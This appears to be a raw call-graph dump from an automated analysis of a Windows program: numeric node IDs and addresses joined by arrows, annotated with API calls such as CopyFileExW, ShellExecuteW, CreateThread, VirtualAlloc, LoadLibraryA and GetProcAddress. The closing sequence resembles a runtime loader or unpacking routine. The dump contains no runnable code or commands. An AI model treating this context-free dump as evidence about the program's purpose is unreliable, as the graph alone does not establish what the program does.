76087->76088 76089 2581889 76088->76089 76090 25818bf 76089->76090 76140 25c7a30 76089->76140 76093 25818d9 HeapFree 76090->76093 76094 257ae8a 76090->76094 76092 25818b3 76092->76090 76095 25c1410 52 API calls 76092->76095 76093->76094 76094->75152 76094->75153 76096 2581915 76095->76096 76097 258194a 76096->76097 76098 25c7a30 59 API calls 76096->76098 76097->76090 76101 258196a HeapFree 76097->76101 76099 258193c 76098->76099 76099->76097 76100 258197d CopyFileExW 76099->76100 76102 258199e 76100->76102 76103 25819d6 GetLastError 76100->76103 76101->76090 76102->76097 76105 25819b7 HeapFree 76102->76105 76103->76097 76104 25819f7 HeapFree 76103->76104 76104->76097 76105->76097 76107 25cca50 49 API calls 76106->76107 76108 257ea84 76107->76108 76109 25d85f4 50 API calls 76108->76109 76110 257eac0 76109->76110 76111 257ead7 ShellExecuteW 76110->76111 76112 257eac8 HeapFree 76110->76112 76113 257eaef GetLastError 76111->76113 76114 257eb3d 76111->76114 76112->76111 76185 25cc4e0 54 API calls 76113->76185 76115 257eb44 HeapFree 76114->76115 76116 257eb53 76114->76116 76115->76116 76118 257eb6c 76116->76118 76119 257eb5a HeapFree 76116->76119 76118->75160 76119->76118 76120 257eb31 76186 2596aa8 HeapFree HeapFree 76120->76186 76122->75101 76123->75124 76124->75124 76125->75114 76126->75126 76127->75155 76128->75151 76130->75160 76131->76044 76132->76047 76133->76057 76134->76070 76138->76076 76139->76083 76143 25c7a6e 76140->76143 76141 25c7aba 76141->76092 76142 25c7bb4 SetLastError GetFullPathNameW 76142->76143 76144 25c7bcb GetLastError 76142->76144 76143->76141 76143->76142 76147 25c7be8 GetLastError 76143->76147 76149 25c7c14 76143->76149 76176 25f0bd0 50 API calls 76143->76176 76144->76143 76146 25c7c53 GetLastError 76144->76146 76150 25c7c6d 76146->76150 76151 25c7e68 HeapFree 76146->76151 76147->76143 76148 25c7edf 76147->76148 76182 25ecaf0 48 API calls 76148->76182 76153 25c7eff 76149->76153 76162 25c7c21 76149->76162 76150->76141 76156 25c7ecc HeapFree 76150->76156 76151->76150 76183 25eca90 48 API calls 76153->76183 76154 25c7d7c 76157 25c7f3d HeapFree 76154->76157 76158 25c7f4e 76154->76158 76156->76141 76157->76158 76159 25c7f6a 76158->76159 76160 25c7f56 HeapFree 76158->76160 76159->76092 76160->76159 76161 25c7d81 76165 25c7db0 76161->76165 76179 25f0bd0 50 API calls 76161->76179 76162->76161 76177 25c18d0 HeapReAlloc HeapFree GetProcessHeap RtlAllocateHeap 76162->76177 76171 25c7e00 76165->76171 76180 25f0bd0 50 API calls 76165->76180 76166 25c7d51 76166->76161 76168 25c7d68 76166->76168 76169 25c7f15 76168->76169 76170 25c7d70 76168->76170 76184 25ec900 48 API calls 76169->76184 76178 25610d0 48 API calls 76170->76178 76173 25c7e4b 76171->76173 76181 25c1830 50 API calls 76171->76181 76173->76150 76173->76151 76176->76143 76177->76166 76178->76154 76179->76165 76180->76171 76181->76173 76184->76154 76185->76120 76186->76114 76187->75189 76188->75188 76189->75197 76190->75202 76192 25c1410 52 API calls 76191->76192 76193 25c5942 76192->76193 76194 25c5952 76193->76194 76198 25c5968 76193->76198 76220 25c16e0 HeapFree HeapFree 76194->76220 76197 25c5a01 SetLastError GetEnvironmentVariableW 76197->76198 76199 25c5a1a GetLastError 76197->76199 76198->76197 76201 25c5a2c GetLastError 76198->76201 76204 25c5a59 76198->76204 76221 25f0bd0 50 API calls 76198->76221 76199->76198 76200 25c5b20 GetLastError 76199->76200 76203 25c5a8e HeapFree 76200->76203 76217 25c5a9f 76200->76217 76201->76198 76202 25c5b6c 76201->76202 76223 25ecaf0 48 API calls 76202->76223 76203->76217 76206 25c5b8c 76204->76206 76207 25c5a6b 76204->76207 76224 25eca90 48 API calls 76206->76224 76222 25c3580 49 API calls 76207->76222 76208 25c5ae4 76215 25c5afb HeapFree 76208->76215 76218 258409b 76208->76218 76212 25c5a76 76212->76203 76212->76217 76215->76218 76216 25c5b53 HeapFree 76216->76215 76216->76218 76217->76208 76217->76216 76219 25c5b44 HeapFree 76217->76219 76218->74805 76218->74807 76219->76216 76220->76218 76221->76198 76222->76212 76225->75213 76226->75216 76227->75224 76228->75224 76230->75259 76232 256ed80 76233 256ed8f 76232->76233 76234 256edbf FreeConsole 76233->76234 76235 256edfc 76234->76235 76236 256edcb 76234->76236 76240 2591e40 76236->76240 76238 256edd0 76238->76235 76239 256eded HeapFree 76238->76239 76239->76235 76241 2591e53 76240->76241 76242 25cd430 2 API calls 76241->76242 76243 2591e94 76242->76243 76244 259515f 76243->76244 76534 25d1862 76243->76534 76725 25ec900 48 API calls 76244->76725 76247 2591eab 76248 25c68a0 65 API calls 76247->76248 76249 2591f69 76248->76249 76250 2591fef GetSystemInfo 76249->76250 76256 2591f75 76249->76256 76251 259201b 76250->76251 76537 25d3890 76251->76537 76252 25952d7 76733 25ec9a0 48 API calls 76252->76733 76254 259532c 76734 25ec9a0 48 API calls 76254->76734 76256->76251 76256->76252 76256->76254 76258 259538c 76256->76258 76260 2591fc6 HeapFree 76256->76260 76735 25ec9a0 48 API calls 76258->76735 76259 25ec9a0 48 API calls 76367 25950d3 76259->76367 76260->76251 76262 25953cd 76736 25ece40 48 API calls 76262->76736 76265 2592045 76267 259297f 76265->76267 76265->76367 76571 25d632b AcquireSRWLockExclusive 76265->76571 76266 25953eb 76737 25ec9a0 48 API calls 76266->76737 76723 25ecaf0 48 API calls 76267->76723 76272 25d632b 2 API calls 76278 25920e3 76272->76278 76273 259514b 76724 25ecaf0 48 API calls 76273->76724 76274 259541f 76738 25ec9a0 48 API calls 76274->76738 76277 259544b 76739 25eca90 48 API calls 76277->76739 76278->76267 76279 25cd430 2 API calls 76278->76279 76281 25921a9 76279->76281 76282 259517c 76281->76282 76283 25921b1 76281->76283 76726 25ec900 48 API calls 76282->76726 76285 25cd430 2 API calls 76283->76285 76290 25921fb 76285->76290 76286 259518b 76727 25ecaf0 48 API calls 76286->76727 76288 2594efa 76705 25ec900 48 API calls 76288->76705 76289 259519f 76728 25ec900 48 API calls 76289->76728 76290->76288 76293 25950ce 76290->76293 76297 25cd430 2 API calls 76290->76297 76718 25610d0 48 API calls 76293->76718 76294 2594f10 76706 25ec900 48 API calls 76294->76706 76328 2592258 76297->76328 76298 2594f1f 76707 25ecaf0 48 API calls 76298->76707 76300 25924de 76719 25ec900 48 API calls 76300->76719 76301 2594f33 76708 25ec900 48 API calls 76301->76708 76303 25950f6 76720 25ecaf0 48 API calls 76303->76720 76306 2594f4c 76709 25f131d 50 API calls 76306->76709 76307 259510a 76721 25ec900 48 API calls 76307->76721 76310 2595119 76722 25ec900 48 API calls 76310->76722 76312 2594f65 76710 25ec900 48 API calls 76312->76710 76313 2594fda HeapFree 76315 2594fef 76313->76315 76314 25922c0 HeapReAlloc 76314->76315 76314->76328 76712 25ec900 48 API calls 76315->76712 76317 2594f74 76711 25ec9a0 48 API calls 76317->76711 76320 2595021 76713 25ec9a0 48 API calls 76320->76713 76322 259504d 76714 25ec9a0 48 API calls 76322->76714 76323 25cd430 GetProcessHeap RtlAllocateHeap 76323->76328 76325 2595079 76715 25eca90 48 API calls 76325->76715 76326 25c1bb0 54 API calls 76326->76328 76328->76267 76328->76288 76328->76294 76328->76300 76328->76313 76328->76314 76328->76315 76328->76323 76328->76326 76330 25d632b 2 API calls 76328->76330 76333 25aa869 50 API calls 76328->76333 76336 259249a 76328->76336 76329 2595092 76716 25ecaf0 48 API calls 76329->76716 76330->76328 76332 25950a6 76717 25ece40 48 API calls 76332->76717 76333->76328 76335 25924fb 76335->76286 76341 2592531 76335->76341 76336->76335 76337 25924be HeapReAlloc 76336->76337 76338 25924e3 HeapFree 76336->76338 76337->76300 76337->76335 76338->76335 76340 2592583 76342 25cd430 2 API calls 76340->76342 76341->76340 76656 25aa99b 61 API calls 76341->76656 76343 2592621 76342->76343 76343->76289 76347 2592629 76343->76347 76344 25928c4 76576 25d6767 76344->76576 76345 25cd430 2 API calls 76345->76347 76347->76267 76347->76301 76347->76344 76347->76345 76657 25aa869 50 API calls 76347->76657 76349 259290c 76580 25d13c8 76349->76580 76354 259313b HeapFree 76355 259314c 76354->76355 76637 25d158a 76355->76637 76356 259306d 76356->76354 76356->76355 76359 25d13c8 121 API calls 76360 25931a1 76359->76360 76361 25931af 76360->76361 76363 2593311 76360->76363 76640 2581ac7 76361->76640 76368 2581ac7 138 API calls 76363->76368 76364 25cd430 GetProcessHeap RtlAllocateHeap 76436 259291d 76364->76436 76366 25931c8 76510 2595243 76366->76510 76653 25d25a4 76366->76653 76367->76259 76741 2581a34 HeapFree HeapFree HeapFree HeapFree HeapFree 76367->76741 76418 2593368 76368->76418 76370 25d25a4 118 API calls 76370->76418 76371 25933a2 76371->76262 76371->76267 76371->76367 76375 25d07da 121 API calls 76371->76375 76372 25c5900 65 API calls 76372->76436 76373 25d07da 121 API calls 76381 2593229 76373->76381 76377 2593ac8 76375->76377 76376 25d07da 121 API calls 76376->76418 76379 259546c 76377->76379 76424 2593ad0 76377->76424 76740 2581a34 HeapFree HeapFree HeapFree HeapFree HeapFree 76379->76740 76381->76367 76381->76373 76389 25932cb 76381->76389 76666 25d24e9 118 API calls 76381->76666 76382 2592c67 HeapFree 76382->76436 76384 2593ed2 76384->76266 76403 25939d8 76384->76403 76671 2581a34 HeapFree HeapFree HeapFree HeapFree HeapFree 76384->76671 76385 2581a34 HeapFree HeapFree HeapFree HeapFree HeapFree 76385->76424 76386 2594e83 76701 25ecaf0 48 API calls 76386->76701 76387 25d07da 121 API calls 76387->76424 76395 25d158a 121 API calls 76389->76395 76390 2594e97 76702 25ecaf0 48 API calls 76390->76702 76391 25cb990 48 API calls 76391->76436 76407 259330c 76395->76407 76396 25951d0 76729 25c1960 49 API calls 76396->76729 76398 2594ee4 76704 25f1298 50 API calls 76398->76704 76399 25d158a 121 API calls 76402 2593f56 76399->76402 76401 25d158a 121 API calls 76401->76407 76408 2593f5f 76402->76408 76409 2593fb1 76402->76409 76403->76367 76403->76401 76405 25951dc 76730 25ec9a0 48 API calls 76405->76730 76406 2593526 76703 25f1215 48 API calls 76406->76703 76407->76399 76413 25952ab 76408->76413 76434 2593f6c 76408->76434 76672 25d166f 76409->76672 76410 2595535 76742 25ece40 48 API calls 76410->76742 76732 25ec9a0 48 API calls 76413->76732 76418->76266 76418->76273 76418->76298 76418->76367 76418->76370 76418->76371 76418->76376 76418->76390 76418->76398 76418->76403 76418->76406 76667 25d24e9 118 API calls 76418->76667 76668 25d4085 48 API calls 76418->76668 76419 2592de8 CreateThread 76419->76436 76827 25cccc0 SetThreadStackGuarantee 76419->76827 76422 2594db8 76426 2594dd1 76422->76426 76508 2594057 76422->76508 76423 2593fe5 76423->76267 76431 25d07da 121 API calls 76423->76431 76424->76332 76424->76384 76424->76385 76424->76386 76424->76387 76424->76410 76443 2594e0d 76424->76443 76669 25d25f9 86 API calls 76424->76669 76670 25d65d1 HeapFree HeapFree 76424->76670 76697 25ec9a0 48 API calls 76426->76697 76428 25941d7 76680 25d095b 112 API calls 76428->76680 76438 2594031 76431->76438 76433 2592fab HeapFree GetLastError 76433->76436 76434->76428 76434->76443 76530 25945b8 76434->76530 76679 2581a34 HeapFree HeapFree HeapFree HeapFree HeapFree 76434->76679 76436->76267 76436->76288 76436->76301 76436->76303 76436->76306 76436->76307 76436->76310 76436->76312 76436->76317 76436->76329 76436->76356 76436->76364 76436->76367 76436->76372 76436->76382 76436->76391 76436->76396 76436->76419 76436->76433 76445 2592f9c HeapFree 76436->76445 76467 2592f51 76436->76467 76585 25d07da 76436->76585 76659 2561310 51 API calls 76436->76659 76661 25d64a4 54 API calls 76436->76661 76662 25d6466 HeapFree HeapFree 76436->76662 76663 257fb9e HeapFree HeapFree 76436->76663 76664 25d095b 112 API calls 76436->76664 76665 25f13bd 49 API calls 76436->76665 76437 2594dfd 76698 25ef4c2 54 API calls 76437->76698 76438->76301 76442 2594047 76438->76442 76449 2594041 76438->76449 76677 25d7226 48 API calls 76442->76677 76443->76367 76455 2594e5a 76443->76455 76445->76433 76447 2594200 76479 2594ccd 76447->76479 76690 25d6868 61 API calls 76447->76690 76448 2594e08 76448->76238 76449->76442 76454 25940c5 76449->76454 76451 25946f8 76459 25cd430 2 API calls 76451->76459 76469 25946c3 76451->76469 76452 2594232 76452->76437 76457 259424d 76452->76457 76453 25941e2 76453->76447 76453->76452 76453->76530 76681 25d6974 HeapFree HeapFree 76453->76681 76454->76262 76454->76367 76474 2594126 76454->76474 76699 25d69dc 56 API calls 76455->76699 76456 25d158a 121 API calls 76456->76434 76462 25d04d0 55 API calls 76457->76462 76466 2594747 76459->76466 76461 2594c78 76471 2594c9c 76461->76471 76472 2594c82 76461->76472 76470 2594272 76462->76470 76463 2594e6b 76463->76447 76473 2594e73 76463->76473 76465 2594d14 76475 2594d2a 76465->76475 76692 25d6a80 HeapFree 76465->76692 76466->76410 76481 25cd430 2 API calls 76466->76481 76467->76436 76660 25d1436 55 API calls 76467->76660 76469->76461 76504 2594c19 76469->76504 76470->76367 76470->76443 76490 25d07da 121 API calls 76470->76490 76471->76447 76478 2594ca8 HeapFree 76471->76478 76472->76471 76689 25d1436 55 API calls 76472->76689 76700 25d1436 55 API calls 76473->76700 76480 25d07da 121 API calls 76474->76480 76483 2594d44 76475->76483 76693 25d6a80 HeapFree 76475->76693 76478->76447 76479->76465 76691 25d6add HeapFree 76479->76691 76487 2594137 76480->76487 76488 2594763 76481->76488 76489 2594d5e 76483->76489 76694 25d6a80 HeapFree 76483->76694 76486 2594e7e 76486->76447 76487->76367 76678 25d7226 48 API calls 76487->76678 76488->76410 76533 259476b 76488->76533 76492 2594d78 76489->76492 76695 25d6a80 HeapFree 76489->76695 76494 25942e9 76490->76494 76493 2594d92 76492->76493 76696 25d6a80 HeapFree 76492->76696 76493->76238 76494->76443 76498 25942f7 76494->76498 76503 25d25a4 118 API calls 76498->76503 76499 2594c76 76499->76471 76500 259415e 76500->76266 76500->76508 76526 25942fc 76503->76526 76504->76469 76504->76499 76505 2594c5d HeapFree 76504->76505 76688 25d1463 58 API calls 76504->76688 76505->76504 76506 2594378 76507 2594394 76506->76507 76511 25943df 76506->76511 76683 25d1463 58 API calls 76507->76683 76508->76434 76508->76456 76731 25ec9a0 48 API calls 76510->76731 76512 2594697 76511->76512 76516 25944cc 76511->76516 76685 25d640e 56 API calls 76512->76685 76514 25cd430 2 API calls 76514->76533 76515 25d5a93 121 API calls 76515->76526 76516->76293 76522 25cd430 2 API calls 76516->76522 76517 2594bc9 HeapFree HeapFree 76517->76469 76518 25d07da 121 API calls 76518->76526 76519 25943b3 76519->76511 76521 25943d0 HeapFree 76519->76521 76521->76511 76525 259451b 76522->76525 76523 2594934 HeapFree 76523->76533 76525->76300 76527 2594523 76525->76527 76526->76506 76526->76515 76526->76518 76682 25d24e9 118 API calls 76526->76682 76528 25946b8 76527->76528 76531 259457a 76527->76531 76686 25d640e 56 API calls 76528->76686 76687 25d640e 56 API calls 76530->76687 76531->76530 76684 25f1322 50 API calls 76531->76684 76533->76267 76533->76277 76533->76320 76533->76322 76533->76325 76533->76510 76533->76514 76533->76517 76533->76523 76535 25d04d0 55 API calls 76534->76535 76536 25d1873 76535->76536 76536->76247 76538 25d38ad CreateIoCompletionPort 76537->76538 76539 25d39d6 76537->76539 76540 25d38cf 76538->76540 76541 25d39fa GetLastError 76538->76541 76543 25d39e8 76539->76543 76544 25d3d5b 76539->76544 76542 25cd430 2 API calls 76540->76542 76559 25d3bb5 76541->76559 76545 25d38e6 76542->76545 76549 25c1bb0 54 API calls 76543->76549 76543->76559 76560 25d3d9d 76543->76560 76744 25610d0 48 API calls 76544->76744 76545->76544 76546 25d3d71 76545->76546 76552 25cd430 2 API calls 76545->76552 76746 25ec900 48 API calls 76546->76746 76553 25d3b8b 76549->76553 76550 25d3bad 76550->76559 76745 25ec900 48 API calls 76550->76745 76551 25d3d80 76747 25ec900 48 API calls 76551->76747 76562 25d3915 76552->76562 76556 25cd430 2 API calls 76553->76556 76556->76550 76557 25d3d8f 76748 25ec900 48 API calls 76557->76748 76559->76265 76749 25ec900 48 API calls 76560->76749 76562->76543 76562->76544 76562->76551 76563 25cd430 2 API calls 76562->76563 76569 25d399a 76563->76569 76564 25d3a44 HeapReAlloc 76565 25d3a71 76564->76565 76566 25d3a65 76564->76566 76565->76544 76568 25d3a91 76565->76568 76743 25ec900 48 API calls 76566->76743 76570 25cd430 2 API calls 76568->76570 76569->76543 76569->76557 76569->76564 76569->76565 76570->76543 76572 25d6347 76571->76572 76573 25d63ac 76572->76573 76750 25a9870 76572->76750 76575 25920d6 76575->76272 76577 25d6777 76576->76577 76578 25d678b HeapFree 76577->76578 76579 25928ff 76577->76579 76578->76579 76579->76349 76658 25d6bda HeapFree 76579->76658 76581 25d166f 121 API calls 76580->76581 76582 25d13dc 76581->76582 76583 25d13e4 76582->76583 76753 25f120b 48 API calls 76582->76753 76583->76436 76586 25d091f 76585->76586 76587 25d07f8 TlsGetValue 76585->76587 76755 25f0970 48 API calls 76586->76755 76589 25d0805 76587->76589 76590 25d081f TlsGetValue 76589->76590 76591 25d0929 76589->76591 76592 25d088e 76589->76592 76590->76592 76593 25d082c 76590->76593 76756 25f0970 48 API calls 76591->76756 76592->76436 76596 25cd430 2 API calls 76593->76596 76600 25d0871 76593->76600 76595 25d084d 76601 25d0868 TlsSetValue 76595->76601 76757 25f0970 48 API calls 76595->76757 76597 25d0845 76596->76597 76597->76595 76598 25d094c 76597->76598 76758 25ec900 48 API calls 76598->76758 76600->76592 76754 25d095b 112 API calls 76600->76754 76601->76600 76604 25d095b 76606 25d0970 76604->76606 76620 25d0960 76604->76620 76607 25d0980 76606->76607 76609 25d664d 76606->76609 76610 25d663c HeapFree 76606->76610 76607->76436 76608 25d66da 76612 25d66f7 76608->76612 76613 25d66e3 HeapFree 76608->76613 76759 25d679f HeapFree 76609->76759 76610->76609 76614 25d6714 76612->76614 76615 25d6700 HeapFree 76612->76615 76613->76612 76617 25d6767 HeapFree 76614->76617 76615->76614 76616 25d6655 76760 25d67cf 89 API calls 76616->76760 76621 25d671f 76617->76621 76620->76607 76620->76608 76624 25d66cb HeapFree 76620->76624 76762 25d6baa HeapFree HeapFree 76620->76762 76763 25d6bda HeapFree 76620->76763 76764 25d679f HeapFree 76621->76764 76622 25d665d 76626 25d6673 76622->76626 76761 25d6868 61 API calls 76622->76761 76624->76608 76629 25d668d 76626->76629 76631 25d667e HeapFree 76626->76631 76627 25d672a 76765 25d67cf 89 API calls 76627->76765 76629->76436 76631->76629 76632 25d6732 76633 25d6748 76632->76633 76766 25d6868 61 API calls 76632->76766 76635 25d6762 76633->76635 76636 25d6753 HeapFree 76633->76636 76635->76436 76636->76635 76767 25d15a4 76637->76767 76639 2593157 76639->76359 76639->76367 76641 25d07da 121 API calls 76640->76641 76642 2581ad9 76641->76642 76643 2581b59 76642->76643 76644 25d632b 2 API calls 76642->76644 76652 2581b18 76642->76652 76647 2581bda 76643->76647 76643->76652 76645 2581b05 76644->76645 76646 2581b0d 76645->76646 76648 25d1862 55 API calls 76645->76648 76784 25d719d 48 API calls 76646->76784 76785 25d8b49 8 API calls 76647->76785 76648->76646 76651 2581be1 76651->76652 76652->76366 76786 25d1727 76653->76786 76655 25d25a9 76655->76381 76656->76341 76657->76347 76658->76349 76659->76436 76660->76467 76661->76436 76662->76436 76663->76436 76664->76436 76665->76436 76666->76381 76667->76418 76668->76418 76669->76424 76670->76424 76671->76403 76673 25d07da 121 API calls 76672->76673 76674 25d1680 76673->76674 76676 2593fc5 76674->76676 76826 25d719d 48 API calls 76674->76826 76676->76274 76676->76422 76676->76423 76677->76508 76678->76500 76679->76428 76680->76453 76681->76452 76682->76526 76683->76519 76684->76531 76685->76447 76686->76469 76687->76451 76688->76504 76689->76472 76690->76479 76691->76465 76692->76475 76693->76483 76694->76489 76695->76492 76696->76493 76698->76448 76699->76463 76700->76486 76704->76288 76705->76294 76706->76298 76708->76306 76709->76312 76710->76317 76712->76320 76718->76367 76719->76303 76721->76310 76722->76267 76725->76367 76726->76286 76728->76367 76729->76405 76740->76367 76741->76367 76743->76565 76744->76550 76745->76546 76746->76551 76747->76557 76748->76560 76751 25a9883 ReleaseSRWLockExclusive 76750->76751 76752 25a9877 76750->76752 76751->76575 76752->76751 76754->76592 76755->76591 76756->76595 76757->76601 76758->76604 76759->76616 76760->76622 76761->76626 76762->76620 76763->76620 76764->76627 76765->76632 76766->76633 76768 25d07da 121 API calls 76767->76768 76769 25d15b6 76768->76769 76770 25d160c 76769->76770 76771 25d15c5 76769->76771 76772 25d1649 76769->76772 76774 25d15f3 76770->76774 76782 25ec9a0 48 API calls 76770->76782 76771->76772 76773 25d15d9 76771->76773 76777 25d07da 121 API calls 76772->76777 76773->76774 76781 25d095b 112 API calls 76773->76781 76774->76639 76778 25d1680 76777->76778 76779 25d1694 76778->76779 76783 25d719d 48 API calls 76778->76783 76779->76639 76781->76774 76783->76779 76784->76643 76785->76651 76787 25d17c7 76786->76787 76788 25d1736 TlsGetValue 76786->76788 76819 25f0970 48 API calls 76787->76819 76791 25d1743 76788->76791 76792 25d1759 TlsGetValue 76791->76792 76808 25d174b 76791->76808 76820 25f0970 48 API calls 76791->76820 76795 25d1766 76792->76795 76792->76808 76796 25cd430 2 API calls 76795->76796 76801 25d17a2 76795->76801 76797 25d177d 76796->76797 76798 25d17f1 76797->76798 76799 25d1781 76797->76799 76822 25ec900 48 API calls 76798->76822 76802 25d1799 TlsSetValue 76799->76802 76821 25f0970 48 API calls 76799->76821 76801->76808 76818 25c13f0 HeapFree 76801->76818 76802->76801 76803 25d1800 76807 25d180f TlsSetValue 76803->76807 76824 25f0970 48 API calls 76803->76824 76811 25d182e HeapFree 76807->76811 76812 25d1820 76807->76812 76808->76655 76813 25d1859 76811->76813 76814 25d1843 TlsSetValue 76811->76814 76812->76811 76823 25d095b 112 API calls 76812->76823 76825 25f0970 48 API calls 76813->76825 76814->76655 76818->76808 76819->76788 76820->76792 76821->76802 76822->76803 76823->76811 76824->76807 76825->76814 76826->76676 76828 25ccd02 GetLastError 76827->76828 76832 25ccd0d 76827->76832 76829 25ccd78 76828->76829 76828->76832 76837 25ec9a0 48 API calls 76829->76837 76831 25ccd52 HeapFree 76832->76831 76833 25ccd43 HeapFree 76832->76833 76833->76831 76838 426eb8 8 API calls 76839 25c98d0 76840 25c1410 52 API calls 76839->76840 76841 25c98e5 76840->76841 76842 25c9922 76841->76842 76843 25c7a30 59 API calls 76841->76843 76844 25c9913 76843->76844 76844->76842 76845 25c9932 CreateDirectoryW 76844->76845 76846 25c993f 76845->76846 76847 25c9948 GetLastError 76845->76847 76846->76842 76848 25c9958 HeapFree 76846->76848 76847->76842 76847->76848 76848->76842 76849 42badf 76850 42bae9 76849->76850 76855 42bb1f 76850->76855 76858 42bb0e 76850->76858 76871 42b85c RaiseException TlsAlloc InitializeCriticalSection 76850->76871 76852 42bb2e 76856 42bb47 76852->76856 76857 42bb34 76852->76857 76872 42b758 TlsGetValue 76855->76872 76873 42b8f8 8 API calls 76857->76873 76860 42b64b EnterCriticalSection 76858->76860 76865 42b66a 76860->76865 76861 42b722 76862 42b737 LeaveCriticalSection 76861->76862 76862->76855 76863 42b6b4 GlobalHandle GlobalUnlock GlobalReAlloc 76867 42b6d6 76863->76867 76864 42b6a4 GlobalAlloc 76864->76867 76865->76861 76865->76863 76865->76864 76866 42b704 GlobalLock 76866->76861 76867->76866 76868 42b6f5 LeaveCriticalSection 76867->76868 76869 42b6eb GlobalHandle GlobalLock 76867->76869 76874 421452 RaiseException 76868->76874 76869->76868 76871->76858 76872->76852 76873->76856 76875 415dde 76876 415dea 76875->76876 76877 415df6 GetVersionExA 76876->76877 76878 415e32 76877->76878 76879 415e3e GetModuleHandleA 76877->76879 76878->76879 76880 415e5a 76879->76880 76918 418875 HeapCreate 76880->76918 76882 415eac 76883 415eb8 76882->76883 77012 415dba 36 API calls 76882->77012 76926 419d60 76883->76926 76886 415ebe 76887 415ec9 76886->76887 77013 415dba 36 API calls 76886->77013 76941 41aecc 76887->76941 76891 415ee3 GetCommandLineA 76958 41adaa 76891->76958 76894 415ee2 76894->76891 76897 415efd 76898 415f08 76897->76898 77015 415d95 36 API calls 76897->77015 76988 41aad5 76898->76988 76902 415f19 77000 41726c 76902->77000 76906 415f2d GetStartupInfoA 77004 41aa6c 76906->77004 76909 415f3f GetModuleHandleA 77008 42da58 76909->77008 76910 415f2c 76910->76906 76914 415f6f 77019 4173c6 36 API calls 76914->77019 76917 415f74 76919 418895 76918->76919 76920 4188bf 76918->76920 76921 4188c2 76919->76921 76922 4188a4 76919->76922 76920->76882 76921->76882 77020 4188c6 HeapAlloc 76922->77020 76924 4188ae 76924->76921 76925 4188b3 HeapDestroy 76924->76925 76925->76920 77021 4186f8 GetModuleHandleA GetProcAddress 76926->77021 76928 419d65 76929 419d79 76928->76929 76930 419d69 TlsAlloc 76928->76930 77022 419cd1 39 API calls 76929->77022 76930->76929 76931 419d81 76930->76931 77023 41d4e0 36 API calls 76931->77023 76933 419d7e 76933->76886 76935 419d8e 76936 419dc6 76935->76936 76937 419d96 TlsSetValue 76935->76937 77024 419cd1 39 API calls 76936->77024 76937->76936 76938 419da7 GetCurrentThreadId 76937->76938 76938->76886 76940 419dcb 76940->76886 77025 4153da 76941->77025 76943 41af21 GetStartupInfoA 76949 41b024 76943->76949 76954 41af3b 76943->76954 76945 41b0b4 SetHandleCount 76957 415ed7 76945->76957 76946 41b053 GetStdHandle 76947 41b061 GetFileType 76946->76947 76946->76949 76947->76949 76948 4153da 36 API calls 76948->76954 76949->76945 76949->76946 76956 41b078 76949->76956 76950 41afac 76950->76949 76951 41afd2 GetFileType 76950->76951 76952 41afdd 76950->76952 76951->76950 76951->76952 76952->76950 76952->76957 77028 41e3e2 GetModuleHandleA GetProcAddress 76952->77028 76954->76948 76954->76949 76954->76950 76956->76949 76956->76957 77029 41e3e2 GetModuleHandleA GetProcAddress 76956->77029 76957->76891 77014 415d95 36 API calls 76957->77014 76959 41ade5 76958->76959 76960 41adc6 GetEnvironmentStringsW 76958->76960 76962 41adce 76959->76962 76964 41ae75 76959->76964 76961 41adda GetLastError 76960->76961 76960->76962 76961->76959 76965 41ae04 WideCharToMultiByte 76962->76965 76966 41adfc GetEnvironmentStringsW 76962->76966 76963 41ae81 GetEnvironmentStrings 76967 415ef3 76963->76967 76968 41ae8d 76963->76968 76964->76963 76964->76967 76970 41ae38 76965->76970 76971 41ae6a FreeEnvironmentStringsW 76965->76971 76966->76965 76966->76967 76981 41ad08 76967->76981 76972 4153da 36 API calls 76968->76972 76973 4153da 36 API calls 76970->76973 76971->76967 76980 41aea6 76972->76980 76974 41ae3e 76973->76974 76974->76971 76975 41ae47 WideCharToMultiByte 76974->76975 76977 41ae61 76975->76977 76978 41ae58 76975->76978 76976 41aebc FreeEnvironmentStringsA 76976->76967 76977->76971 77035 4153ec 36 API calls 76978->77035 76980->76976 76982 41ad1a 76981->76982 76983 41ad1f GetModuleFileNameA 76981->76983 77036 41809a 65 API calls 76982->77036 76985 41ad47 76983->76985 76986 4153da 36 API calls 76985->76986 76987 41ad72 76986->76987 76987->76897 76989 41aae2 76988->76989 76992 41aae7 76988->76992 77037 41809a 65 API calls 76989->77037 76991 4153da 36 API calls 76998 41ab18 76991->76998 76992->76991 76995 415f0e 76992->76995 76993 41ab61 77038 4153ec 36 API calls 76993->77038 76995->76902 77016 415d95 36 API calls 76995->77016 76996 4153da 36 API calls 76996->76998 76997 41ab86 77039 4153ec 36 API calls 76997->77039 76998->76993 76998->76995 76998->76996 76998->76997 77002 417275 77000->77002 77003 415f1f 77002->77003 77040 4159ea 40 API calls 77002->77040 77003->76906 77017 415d95 36 API calls 77003->77017 77005 41aa75 77004->77005 77006 41aa7a 77004->77006 77041 41809a 65 API calls 77005->77041 77006->76909 77009 42daaa 77008->77009 77009->77009 77042 42c58f 77009->77042 77012->76883 77013->76887 77014->76894 77015->76898 77016->76902 77017->76910 77018 4173a4 36 API calls 77018->76914 77019->76917 77020->76924 77021->76928 77022->76933 77023->76935 77024->76940 77030 4153ae 77025->77030 77028->76952 77029->76956 77031 4153d7 77030->77031 77033 4153b5 77030->77033 77031->76943 77031->76957 77033->77031 77034 415333 36 API calls 77033->77034 77034->77033 77035->76977 77036->76983 77037->76992 77038->76995 77039->76995 77040->77003 77041->77006 77045 42c59f 77042->77045 77046 42c63c 77045->77046 77047 42c6b2 VirtualAlloc 77046->77047 77048 42c6f8 77047->77048 77048->77048 77049 42c720 VirtualAlloc 77048->77049 77050 415f5f 77049->77050 77052 42c74a 77049->77052 77050->76914 77050->77018 77051 42c8ac LoadLibraryA 77051->77050 77051->77052 77052->77050 77052->77051 77053 42c8ff 77052->77053 77054 42c8df GetProcAddress 77052->77054 77056 25dd76d 77053->77056 77054->77052 77057 25dd779 77056->77057 77076 25dd97d 77057->77076 77059 25dd8d9 77127 25e26f3 15 API calls 77059->77127 77061 25dd8e6 77128 25e26b7 15 API calls 77061->77128 77063 25dd8ee 77064 25dd7c9 77064->77050 77065 25dd84a 77085 25e2365 77065->77085 77067 25dd780 77067->77059 77067->77064 77067->77065 77124 25e26cd 11 API calls 77067->77124 77069 25dd850 77089 256eac0 RtlAddVectoredExceptionHandler 77069->77089 77071 25dd867 77071->77059 77072 25dd875 77071->77072 77073 25dd87e 77072->77073 77125 25e26a8 15 API calls 77072->77125 77126 25ddaee 7 API calls 77073->77126 77077 25dd986 77076->77077 77129 25e049e 10 API calls 77077->77129 77079 25dd997 77080 25dd99b 77079->77080 77130 25e2ce6 77079->77130 77080->77067 77083 25dd9b2 77083->77067 